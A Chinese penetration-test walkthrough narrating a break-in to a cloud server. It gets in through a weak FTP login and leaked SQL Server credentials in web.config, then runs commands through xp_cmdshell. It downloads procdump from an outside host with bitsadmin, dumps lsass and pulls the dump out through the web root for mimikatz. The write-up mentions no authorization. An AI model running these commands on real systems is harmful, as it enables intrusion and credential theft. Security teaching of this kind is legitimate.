声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
信息收集
IP为阿里云118.19.xx.xx、开放大量端口21,22,80,81,1433,3389,8888等等
ftp弱口令
指纹识别发现81端口为serv-u软件。一个弱口令ftp/ftp直接登录。原以为ftp用来传输文件作用不大,没想到无意中翻找到了web.config的敏感文件。
打开很明显看到sql server的配置信息。
mssql命令执行
开启xp_cmdshell组件
exec sp_configure ‘show advanced options’,1;reconfigure;
exec sp_configure ‘xp_cmdshell’,1;reconfigure;
直接执行系统命令
exec master.dbo.xp_cmdshell ‘whoami’;
因为阿里云服务器的原因,想着直接激活guest用户,结果在添加到管理员组的时候并没有成功。查看进程,发现存在防护aliyundun.exe
那采用prodump导出lsass.dmp,然后从web下载到本地,再使用mimikatz读取密码。
此时有一个问题,web的绝对路径还不知道。
web路径查找
该IP的8888端口正常运行着web服务,为一login.aspx登录地址。
dir搜索logon.aspx
exec master.dbo.xp_cmdshell ‘cd /d E: && dir /b /s Logon.aspx’
找到网站绝对路径,就简单啦~
dump hash
从公网上下载prodump.exe下载到靶机上。
exec master.dbo.xp_cmdshell ‘bitsadmin /transfer myDownLoadJob /download /priority normal “http://144.34.xxx.xxx/procdump64.exe” “C:\Windows\system32\procdump.exe”‘
procdump.exe -accepteula -ma lsass.exe lsass.dmp
导出lsass.dmp
再copy lsass.dmp到网站根目录下。需要重命名为txt后缀名。
exec master.dbo.xp_cmdshell ‘copy lsass.dmp “E:Program FilesDESS.Webtmp.txt”‘
需要注意的是:
因为windows文件夹名称中间没有空格,如果文件夹名(或者目录名)中有空格,就必须加双引号了
访问tmp.txt下载。然后本地的mimikatz读取即可。
总结
不要放过任何一个细节。而且这次成功渗透,发现全程以静默化状态运行,没有挂马,没有恶意扫描。
E
N
D
gūan
关
zhù
注
wǒ
我
men
们
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,目前聚集了十多位专业的安全攻防技术研究人员,专注于网络攻防、Web安全、移动终端、安全开发、IoT/物联网/工控安全等方向。
想了解更多Tide安全团队,请关注团队官网: http://www.TideSec.net 或长按二维码关注公众号:
原文始发于微信公众号(白帽子):【实战技巧】ftp引发的一次渗透实战
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论